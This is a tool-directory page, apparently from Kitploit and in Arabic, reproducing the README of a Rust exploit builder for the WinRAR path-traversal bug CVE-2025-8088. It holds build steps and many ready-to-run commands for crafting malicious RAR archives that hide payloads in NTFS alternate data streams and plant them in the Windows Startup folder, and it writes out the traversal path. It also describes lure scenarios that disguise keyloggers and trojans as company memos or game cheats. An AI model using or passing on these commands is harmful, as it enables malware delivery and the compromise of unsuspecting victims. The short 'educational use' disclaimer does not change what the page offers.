Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
WinRAR-Exploit-Tool---Rust-Edition — تنفيذ عالي الأداء وآمن من حيث الذاكرة لأداة استغلال WinRAR CVE-2025-8088، أعيدت كتابتها بلغة Rust لتحسين الموثوقية والأداء. | Kitploit
أدوات/GitHubGitHub/kitsuneshade/winrar-exploit-tool---rust-edition
آليات الاستمراريةالاستغلالاستغلال تطبيقات الويبما بعد الاستغلالاختبار الاختراقالتعلم والتعليمالفريق الأحمرتطوير الحمولاتاستغلال الملفات الثنائية

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
GitHubkitsuneshade/winrar-exploit-tool---rust-edition

WinRAR-Exploit-Tool---Rust-Edition

تنفيذ عالي الأداء وآمن من حيث الذاكرة لأداة استغلال WinRAR CVE-2025-8088، أعيدت كتابتها بلغة Rust لتحسين الموثوقية والأداء.

عرض المستودع
83منذ 11 أشهرلم تتم المراجعة بعد

أداة استغلال WinRAR - إصدار Rust

أداة متقدمة لاستغلال اجتياز المسار في WinRAR - مكتوبة بلغة Rust

تنفيذ عالي الأداء وآمن على مستوى الذاكرة لأداة استغلال WinRAR CVE-2025-8088، أُعيدت كتابتها بلغة Rust لتحسين الموثوقية والأداء.

الميزات

  • استغلال ADS - مخازن بيانات NTFS البديلة لإخفاء الحمولة
  • التلاعب برأس RAR5 - تصحيح مباشر للرأس لحقن المسار
  • واجهة رسومية حديثة - واجهة جميلة مبنية على GTK مع تنسيقات CSS
  • استهداف بدء التشغيل - وضع الحمولة تلقائيًا في مجلد بدء تشغيل Windows
  • دعم إغراء مخصص - استخدم ملفات الإغراء الخاصة بك أو الافتراضية
  • دعم شامل للملفات - يدعم أي نوع ملف للحمولة والإغراء
  • معالجة قوية للأخطاء - فحص شامل للأخطاء والتشخيص
  • تشخيص النظام - فحص تلقائي لتوافق النظام
  • كفاءة في الذاكرة - بصمة ذاكرة منخفضة مع إدارة ذكية للموارد

المتطلبات

  • Rust 1.70+ - سلسلة أدوات Rust الحديثة
  • مكتبات تطوير GTK - لدعم الواجهة الرسومية
  • واجهة أوامر WinRAR - لإنشاء أرشيفات RAR
  • Windows 10/11 - دعم NTFS مطلوب

البدء السريع

1. تثبيت Rust

root@kitploit:~
# Install Rust using rustup


# Verify installation
rustc --version
cargo --version

2. تثبيت مكتبات تطوير GTK

Windows (MSVC)

root@kitploit:~
# Using vcpkg
vcpkg install gtk:x64-windows

أو باستخدام MSYS2

root@kitploit:~
pacman -S mingw-w64-x86_64-gtk4

3. الاستنساخ والبناء

root@kitploit:~
# Navigate to the rust project
cd winrar_exploit_rust

# Build in debug mode
cargo build

# Build optimized release
cargo build --release

# Run the application
cargo run --release

الاستخدام

  1. اختر الحمولة - اختر أي ملف كحمولة (.exe, .bat, .jpg, .pdf، إلخ.)
  2. اختر الإغراء - حدد أي ملف كإغراء (سيتم إنشاء ملف افتراضي إذا كان فارغًا)
  3. سمِّ الأرشيف - أدخل اسم ملف RAR الناتج
  4. البناء - أنشئ الأرشيف المستغل

أمثلة

الاستخدام الأساسي

أنشئ استغلالًا بسيطًا مع ملف حمولة وملف إغراء:

root@kitploit:~
# Create exploit with executable payload
.\winrar_exploit_rust.exe create --payload "C:\payload.exe" --decoy "C:\decoy.txt" --output "exploit.rar"

# Create exploit with script payload
.\winrar_exploit_rust.exe create --payload "C:\malicious.ps1" --decoy "C:\document.pdf" --output "malicious.rar"

الاستخدام المتقدم

ملفات إغراء متعددة

استخدم عدة ملفات إغراء مفصولة بفواصل:

root@kitploit:~
# Use multiple decoy files separated by commas
.\winrar_exploit_rust.exe create --payload "C:\payload.exe" --decoy "C:\photo.jpg,C:\document.pdf,C:\video.mp4" --output "multi_decoy.rar"

مجلد إسقاط مخصص

حدد مجلدًا مخصصًا حيث سيتم وضع الحمولة:

root@kitploit:~
# Specify custom directory where payload will be placed
.\winrar_exploit_rust.exe create --payload "C:\payload.exe" --decoy "C:\decoy.txt" --output "custom_drop.rar" --drop_dir "C:\Users\Victim\Desktop"

أنواع مختلفة من الحمولة

حمولة صورة (إخفاء بيانات):

root@kitploit:~
# Image payload (steganography)
.\winrar_exploit_rust.exe create --payload "C:\malicious.jpg" --decoy "C:\innocent.txt" --output "image_exploit.rar"

حمولة PDF:

root@kitploit:~
# PDF payload
.\winrar_exploit_rust.exe create --payload "C:\trojan.pdf" --decoy "C:\readme.txt" --output "pdf_exploit.rar"

حمولة سكربت دفعي:

root@kitploit:~
# Batch script payload
.\winrar_exploit_rust.exe create --payload "C:\ransomware.bat" --decoy "C:\instructions.txt" --output "batch_exploit.rar"

تشخيص النظام

root@kitploit:~
# Run system diagnostics to check compatibility
.\winrar_exploit_rust.exe diagnose

# Show available tools and features
.\winrar_exploit_rust.exe tools

سيناريوهات واقعية

السيناريو 1: بيئة الشركات

أنشئ مستندًا خبيثًا يبدو كمذكرة شركة:

root@kitploit:~
# Create a malicious document that looks like a company memo
.\winrar_exploit_rust.exe create --payload "C:\keylogger.exe" --decoy "C:\company_memo.pdf" --output "important_memo.rar"

السيناريو 2: مجتمع الألعاب

أخفِ البرمجيات الخبيثة في ملف غش للعبة:

root@kitploit:~
# Hide malware in a game cheat file
.\winrar_exploit_rust.exe create --payload "C:\trojan.exe" --decoy "C:\game_cheat.txt,C:\screenshot.jpg" --output "cheats.rar"

تنشئ الأداة أرشيفات RAR مع اجتياز المسار باستخدام:

  1. إنشاء ADS - إخفاء الحمولة في تيارات بيانات NTFS البديلة
  2. بناء RAR - إنشاء RAR أساسي مع ADS باستخدام واجهة أوامر WinRAR
  3. تصحيح الرأس - حقن مسار الاجتياز في رؤوس RAR5
  4. إعادة حساب CRC - ضمان سلامة الأرشيف
  5. الإخراج - تسليم RAR خبيث جاهز للاستخراج

مثال المسار: ..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\payload.exe

أنواع الملفات المدعومة

ملفات الحمولة:

  • ✅ ملفات تنفيذية (.exe, .bat, .cmd)
  • ✅ سكربتات (.py, .js, .vbs, .ps1)
  • ✅ مستندات (.pdf, .docx, .xlsx)
  • ✅ صور (.jpg, .png, .gif)
  • ✅ فيديو (.mp4, .avi)
  • ✅ صوتيات (.mp3, .wav)
  • ✅ أي نوع ملف

ملفات الإغراء:

  • ✅ ملفات نصية (.txt, .doc, .pdf)
  • ✅ صور (.jpg, .png, .gif, .bmp)
  • ✅ فيديو (.mp4, .avi)
  • ✅ صوتيات (.mp3, .wav)
  • ✅ مستندات (.docx, .xlsx)
  • ✅ أي نوع ملف

البنية

root@kitploit:~
winrar_exploit_rust/
├── src/
│   ├── main.rs          # Application entry point
│   ├── gui.rs           # GTK-based user interface
│   ├── exploit.rs       # Core exploit logic
│   ├── ads.rs           # NTFS ADS manipulation
│   ├── rar.rs           # RAR5 header manipulation
│   ├── diagnostics.rs   # System diagnostics
│   └── error.rs         # Error handling
├── Cargo.toml           # Dependencies and build config
└── README.md           # This file

استكشاف الأخطاء وإصلاحها

تتضمن الأداة تشخيصًا تلقائيًا يتحقق من:

  • ✅ تثبيت واجهة أوامر WinRAR
  • ✅ دعم NTFS ADS
  • ✅ أذونات مجلد بدء التشغيل
  • ✅ توفر مكتبة GTK
  • ✅ توافق نظام الملفات

المشكلات الشائعة:

  1. "تعذر العثور على GTK"

    root@kitploit:~
    # Install GTK development libraries
    # Windows (vcpkg)
    vcpkg install gtk:x64-windows
    
    # Or using MSYS2
    pacman -S mingw-w64-x86_64-gtk4
    
  2. "تعذر العثور على واجهة أوامر WinRAR"

    • ثبّت WinRAR من https://www.winrar.com
    • تأكد من وجود rar.exe في Program Files
  3. "تعذر الكتابة إلى مجلد بدء التشغيل"

    • شغّل الأداة كمسؤول
    • تحقق من أذونات المجلد
  4. "NTFS ADS غير مدعوم"

    • تأكد من استخدام نظام ملفات NTFS
    • ADS غير مدعوم على FAT32/exFAT
  5. أخطاء الترجمة

    root@kitploit:~
    # Update Rust toolchain
    rustup update
    
    # Clean and rebuild
    cargo clean
    cargo build --release
    

تنسيق الكود

root@kitploit:~
# Format code
cargo fmt

# Lint code
cargo clippy

التبعيات

تشمل التبعيات الرئيسية:

  • gtk - إطار عمل رسومي حديث
  • tokio - وقت تشغيل غير متزامن
  • windows - روابط Windows API
  • crc32fast - حساب سريع لـ CRC32
  • byteorder - التعامل مع ترتيب البايتات
  • anyhow - معالجة الأخطاء

اعتبارات الأمان

  • أغراض تعليمية: هذه الأداة مخصصة للاختبار المصرح به والأغراض التعليمية فقط
  • بيئة خاضعة للتحكم: استخدم فقط في بيئات خاضعة للتحكم مع موافقة مناسبة
  • الامتثال القانوني: تأكد من الامتثال للقوانين واللوائح المعمول بها
  • الإفصاح المسؤول: اتبع ممارسات الإفصاح المسؤول

الترخيص

هذا المشروع مرخص بموجب رخصة MIT - راجع ملف LICENSE للحصول على التفاصيل.

المؤلف

صُنع بواسطة @kanonufo على تيليغرام


أداة فريق أحمر عالية الأداء لاستغلال CVE-2025-8088 - إصدار Rust

تنزيل الأداة